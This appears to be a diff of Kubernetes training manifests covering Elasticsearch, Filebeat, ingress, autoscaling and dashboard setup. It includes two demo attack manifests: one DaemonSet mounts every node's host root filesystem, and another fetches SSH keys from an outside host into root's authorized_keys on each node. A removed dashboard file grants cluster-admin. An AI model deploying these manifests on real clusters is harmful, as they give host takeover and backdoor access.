selfLink: /api/v1/namespaces/default/services/elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
run: elasticsearch
|
||||
sessionAffinity: None
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
|
||||
namespace: default
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: kibana
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5.6.8
|
||||
imagePullPolicy: Always
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /api/v1/namespaces/default/services/kibana
|
||||
namespace: default
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
run: kibana
|
||||
sessionAffinity: None
|
||||
app: kibana
|
||||
type: NodePort
|
||||
|
||||
21
k8s/elasticsearch-cluster.yaml
Normal file
21
k8s/elasticsearch-cluster.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
97
k8s/elasticsearch-operator.yaml
Normal file
97
k8s/elasticsearch-operator.yaml
Normal file
@@ -0,0 +1,97 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
name: elasticsearch-operator
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
30
k8s/event-node.yaml
Normal file
30
k8s/event-node.yaml
Normal file
@@ -0,0 +1,30 @@
|
||||
kind: Event
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
generateName: hello-
|
||||
labels:
|
||||
container.training/test: ""
|
||||
|
||||
#eventTime: "2020-07-04T00:00:00.000000Z"
|
||||
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
|
||||
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
|
||||
#count: 42
|
||||
|
||||
involvedObject:
|
||||
kind: Node
|
||||
apiVersion: v1
|
||||
name: kind-control-plane
|
||||
# Note: the uid should be the Node name (not the uid of the Node).
|
||||
# This might be specific to global objects.
|
||||
uid: kind-control-plane
|
||||
|
||||
type: Warning
|
||||
reason: NodeOverheat
|
||||
message: "Node temperature exceeds critical threshold"
|
||||
action: Hello
|
||||
source:
|
||||
component: thermal-probe
|
||||
#host: node1
|
||||
#reportingComponent: ""
|
||||
#reportingInstance: ""
|
||||
|
||||
36
k8s/event-pod.yaml
Normal file
36
k8s/event-pod.yaml
Normal file
@@ -0,0 +1,36 @@
|
||||
kind: Event
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
# One convention is to use <objectname>.<timestamp>,
|
||||
# where the timestamp is taken with a nanosecond
|
||||
# precision and expressed in hexadecimal.
|
||||
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
|
||||
name: hello.1234567890
|
||||
# The label doesn't serve any purpose, except making
|
||||
# it easier to identify or delete that specific event.
|
||||
labels:
|
||||
container.training/test: ""
|
||||
|
||||
#eventTime: "2020-07-04T00:00:00.000000Z"
|
||||
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
|
||||
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
|
||||
#count: 42
|
||||
|
||||
involvedObject:
|
||||
### These 5 lines should be updated to refer to an object.
|
||||
### Make sure to put the correct "uid", because it is what
|
||||
### "kubectl describe" is using to gather relevant events.
|
||||
#apiVersion: v1
|
||||
#kind: Pod
|
||||
#name: magic-bean
|
||||
#namespace: blue
|
||||
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
|
||||
|
||||
type: Normal
|
||||
reason: BackupSuccessful
|
||||
message: "Object successfully dumped to gitops repository"
|
||||
source:
|
||||
component: gitops-sync
|
||||
#reportingComponent: ""
|
||||
#reportingInstance: ""
|
||||
|
||||
170
k8s/filebeat.yaml
Normal file
170
k8s/filebeat.yaml
Normal file
@@ -0,0 +1,170 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,4 +1,4 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
@@ -11,4 +11,4 @@ roleRef:
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
namespace: kube-system
|
||||
|
||||
34
k8s/hackthecluster.yaml
Normal file
34
k8s/hackthecluster.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hackthecluster
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hackthecluster
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hackthecluster
|
||||
spec:
|
||||
volumes:
|
||||
- name: slash
|
||||
hostPath:
|
||||
path: /
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
containers:
|
||||
- name: alpine
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: slash
|
||||
mountPath: /hostfs
|
||||
command:
|
||||
- sleep
|
||||
- infinity
|
||||
securityContext:
|
||||
#privileged: true
|
||||
capabilities:
|
||||
add:
|
||||
- SYS_CHROOT
|
||||
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -9,7 +9,7 @@ spec:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy
|
||||
image: haproxy:1
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
29
k8s/hpa-v2-pa-httplat.yaml
Normal file
29
k8s/hpa-v2-pa-httplat.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
kind: HorizontalPodAutoscaler
|
||||
apiVersion: autoscaling/v2beta2
|
||||
metadata:
|
||||
name: rng
|
||||
spec:
|
||||
scaleTargetRef:
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
name: rng
|
||||
minReplicas: 1
|
||||
maxReplicas: 20
|
||||
behavior:
|
||||
scaleUp:
|
||||
stabilizationWindowSeconds: 60
|
||||
scaleDown:
|
||||
stabilizationWindowSeconds: 180
|
||||
metrics:
|
||||
- type: Object
|
||||
object:
|
||||
describedObject:
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
name: httplat
|
||||
metric:
|
||||
name: httplat_latency_seconds
|
||||
target:
|
||||
type: Value
|
||||
value: 0.1
|
||||
|
||||
20
k8s/ingress-v1.yaml
Normal file
20
k8s/ingress-v1.yaml
Normal file
@@ -0,0 +1,20 @@
|
||||
apiVersion: networking.k8s.io/v1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
#tls:
|
||||
#- secretName: whatever.A.B.C.D.nip.io
|
||||
# hosts:
|
||||
# - whatever.A.B.C.D.nip.io
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
pathType: Prefix
|
||||
backend:
|
||||
service:
|
||||
name: whatever
|
||||
port:
|
||||
number: 1234
|
||||
17
k8s/ingress-v1beta1.yaml
Normal file
17
k8s/ingress-v1beta1.yaml
Normal file
@@ -0,0 +1,17 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
#tls:
|
||||
#- secretName: whatever.A.B.C.D.nip.io
|
||||
# hosts:
|
||||
# - whatever.A.B.C.D.nip.io
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
@@ -1,14 +0,0 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: cheddar
|
||||
spec:
|
||||
rules:
|
||||
- host: cheddar.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: cheddar
|
||||
servicePort: 80
|
||||
|
||||
1
k8s/ingress.yaml
Symbolic link
1
k8s/ingress.yaml
Symbolic link
@@ -0,0 +1 @@
|
||||
ingress-v1beta1.yaml
|
||||
@@ -1,220 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
@@ -1,5 +1,5 @@
|
||||
apiVersion: v1
|
||||
Kind: Pod
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
|
||||
@@ -1,167 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
